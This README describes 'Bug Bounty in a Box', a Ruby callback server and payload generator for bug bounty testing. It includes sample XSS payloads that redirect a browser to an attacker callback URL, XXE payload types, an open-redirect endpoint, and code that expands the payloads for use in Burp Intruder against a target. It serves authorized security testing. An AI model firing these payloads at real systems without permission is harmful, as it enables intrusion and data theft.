This repository contains all* that you should need to get up and running to test for bugs against your targets.
* Ok, literally not everything but it's a good start!
This is by no means "production ready"; there are still some server configuration options that need to be explored before this should be run in production.
- Add more payloads!
- Add more endpoints!
- Add "Development" guide
To get up & hacking, you'll need to:
- Move the configuration sample: `mv config/application.yml.sample config/application.yml`
- Edit `config/application.yml` to your preferences
- Install the gems: `bundle install`
- Start the server: `ruby app.rb`
- Move the payload sample: `mv payloads/xss.yml.sample payloads/xss.yml`
- Generate the payloads: `ruby generate_payloads.rb --callback=YOUR_SERVER_URL --target=YOUR_TARGET`
- Use `payloads/xss.txt` in Burp's Intruder (or something similar)
- Cross your fingers...
- Profit!
Note: You cannot currently generate payloads with the Docker container. The Docker container only runs the server.
To get up & running in Docker, clone this repository and run the following:

```sh
mv config/application.yml.sample config/application.yml
vim config/application.yml # Edit your config values!
mkdir -p logs
docker build -t bbb . && docker run -d \
  -v $(pwd)/config/application.yml:/app/config/application.yml \
  -v $(pwd)/logs/:/app/logs/ \
  -p 4567:4567 \
  -e "APP_ENV=production" \
  bbb
```

Then, you should be able to `curl localhost:4567` and see the hello world!
If you'd like to know how to set up the Bug Bounty in a Box callback server for "production" use, check out the Wiki.
This "bug bounty in a box" has two different components:
- A payload callback server
- A payload generator
The callback server, written in Ruby & using Sinatra, currently has the following capabilities:
- Callback: A callback with a payload & target parameter will log the "callback" to an on-server text log as well as send a Slack message to a Slack webhook. (`/callback`)
- Payloads: A payload file of your choice that will contain your callback URL. (`/payload`)
  - Currently supports:
    - JavaScript (`js`) for XSS
    - SVG (`svg`) for XSS
    - XML (`xml`) for XXE
    - XML (`svg`) for XXE
- Redirect: Redirects to a specified URL in the `redirect` GET parameter. (`/redirect`)
- Unauthorized: Throws a 401 for non-OPTIONS & non-HEAD requests. Also accepts a `content_type` parameter to return a specific content type. (`/unauthorized`)
You can configure the server in `config/application.yml`! See below for the different configuration options.
In order to receive Slack callbacks, you'll need to set the appropriate `slack_url`. To generate an incoming webhook for your Slack instance, check out Slack's Help Center.
If you'd like to change either the frequency of the log rotation or the log filenames, check out the configuration file.
The payload generator uses `.yml` files to generate a `.txt` file that contains a list of payloads that can be used in a tool like Burp Intruder.
Before running the payload generator, make sure you have some properly formatted `.yml` files in the `payloads` folder! After you've done that, you'll need to run the payload generator with the `--callback` and `--target` flags like such:

```sh
ruby generate_payloads.rb --callback=localhost:4567/callback --target=www.example.com
```

Then, check out the `payloads` folder for the `.txt` file with a list of payloads!
In order to add a new class of payloads, just create a new `.yml` file with the following:

```yaml
name: XSS
payloads:
  - description: A simple XSS payload
    payload: <script>document.location='CALLBACK_URL'</script>
  - payload: <script>document.location="CALLBACK_URL"</script>
```
The `CALLBACK_URL` will be replaced with whatever is passed in with the `--callback` flag, with some added parameters of (1) a callback description & (2) the target.
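As an added illustration of the substitution just described (this is not the project's `generate_payloads.rb`; the YAML below is a constructed copy of the sample above, and the `description`/`target` query-parameter names are an assumption), the following loads a payload class, builds the callback URL from the `--callback` value plus the description and target, and percent-encodes both so spaces or quotes in a description cannot break the quoting inside a payload:

```ruby
require "yaml"
require "cgi"

# Constructed sample in the .yml format shown above (not a file from the project).
SAMPLE_YAML = <<~YML
  name: XSS
  payloads:
    - description: A simple XSS payload
      payload: <script>document.location='CALLBACK_URL'</script>
    - payload: <script>document.location="CALLBACK_URL"</script>
YML

# Build the callback URL: the --callback value plus the description and the
# target as query parameters (parameter names are assumed, not the project's).
# Values are percent-encoded so a description containing spaces or quotes
# stays inside the payload's own single/double quoting.
def callback_url(callback, description, target)
  query = { "description" => description, "target" => target }
    .map { |k, v| "#{k}=#{CGI.escape(v.to_s)}" }
    .join("&")
  "#{callback}?#{query}"
end

# Expand every CALLBACK_URL placeholder in a payload class loaded from YAML.
# Entries without a description fall back to the class name (e.g. "XSS").
def generate_payloads(yaml_text, callback:, target:)
  doc = YAML.safe_load(yaml_text)
  name = doc.fetch("name")
  doc.fetch("payloads").map do |entry|
    desc = entry["description"] || name
    entry.fetch("payload").gsub("CALLBACK_URL", callback_url(callback, desc, target))
  end
end

if __FILE__ == $PROGRAM_NAME
  # One line per payload, the same shape as the generated payloads/xss.txt.
  puts generate_payloads(SAMPLE_YAML, callback: "http://localhost:4567/callback",
                                      target: "www.example.com")
end
```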
Want to contribute? Great! Here's what you do:
- Fork this repository
- Push some code to your fork
- Come back to this repository and open a PR
- After some review, get that PR merged to master
- 🎉 Thank you for your contribution!!
Feel free to also open an issue with any bugs/comments/requests!